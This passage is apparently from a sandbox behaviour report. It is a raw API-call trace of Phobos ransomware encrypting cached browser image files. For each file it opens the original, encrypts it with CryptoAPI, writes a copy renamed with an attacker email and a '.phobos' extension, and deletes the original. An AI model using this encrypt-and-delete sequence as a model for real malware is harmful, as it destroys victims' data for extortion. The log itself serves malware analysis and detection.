HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0183.989] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.989] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0183.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0183.990] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0183.990] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0183.990] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2619, lpOverlapped=0x0) returned 1 [0184.015] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2620, dwBufLen=0x2620 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2620) returned 1 [0184.015] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2620, lpOverlapped=0x0) returned 1 [0184.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0184.016] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.016] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.016] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.016] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.016] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.016] CloseHandle (hObject=0x180) returned 1 [0184.016] CloseHandle (hObject=0x14c) returned 1 [0184.016] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg")) returned 1 [0184.018] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.020] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8068) returned 1 [0184.020] CloseHandle (hObject=0x14c) returned 1 [0184.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg")) returned 0x2020 [0184.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.020] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.020] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.021] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.021] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.021] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f84, lpOverlapped=0x0) returned 1 [0184.038] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1f90, dwBufLen=0x1f90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1f90) returned 1 [0184.038] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1f90, lpOverlapped=0x0) returned 1 [0184.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0184.039] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.039] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.039] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.039] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.039] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.039] CloseHandle (hObject=0x14c) returned 1 [0184.039] CloseHandle (hObject=0x180) returned 1 [0184.039] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg")) returned 1 [0184.044] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.045] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7294) returned 1 [0184.045] CloseHandle (hObject=0x180) returned 1 [0184.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg")) returned 0x2020 [0184.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.046] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.046] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.046] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.046] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.046] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1c7e, lpOverlapped=0x0) returned 1 [0184.178] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c80, dwBufLen=0x1c80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c80) returned 1 [0184.178] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1c80, lpOverlapped=0x0) returned 1 [0184.179] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0184.179] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.179] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.179] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.179] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.179] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.179] CloseHandle (hObject=0x180) returned 1 [0184.179] CloseHandle (hObject=0x14c) returned 1 [0184.179] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg")) returned 1 [0184.180] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.180] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=878) returned 1 [0184.180] CloseHandle (hObject=0x14c) returned 1 [0184.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png")) returned 0x2020 [0184.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.181] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.181] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.181] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.181] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x36e, lpOverlapped=0x0) returned 1 [0184.298] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x370, dwBufLen=0x370 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x370) returned 1 [0184.298] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x370, lpOverlapped=0x0) returned 1 [0184.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0184.299] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.299] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.299] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.299] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.299] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.299] CloseHandle (hObject=0x14c) returned 1 [0184.299] CloseHandle (hObject=0x180) returned 1 [0184.300] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png")) returned 1 [0184.300] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.301] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11440) returned 1 [0184.301] CloseHandle (hObject=0x180) returned 1 [0184.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg")) returned 0x2020 [0184.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.301] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.301] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.302] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.302] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2cb0, lpOverlapped=0x0) returned 1 [0184.383] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2cc0, dwBufLen=0x2cc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2cc0) returned 1 [0184.384] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2cc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2cc0, lpOverlapped=0x0) returned 1 [0184.387] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0184.387] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.387] 